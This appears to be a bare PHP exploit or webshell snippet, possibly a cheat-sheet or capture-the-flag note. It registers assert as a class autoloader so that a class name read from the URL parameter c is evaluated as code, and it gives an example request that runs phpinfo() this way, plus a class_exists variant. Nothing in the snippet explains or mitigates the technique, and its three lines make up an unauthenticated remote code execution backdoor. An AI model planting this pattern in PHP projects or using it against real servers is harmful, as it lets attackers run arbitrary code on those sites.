spl_autoload_register("assert"); $f = $_GET['c']; new $f();
http://test/?c=phpinfo()
spl_autoload_register("assert"); if(class_exists($_GET['c'])) { ... }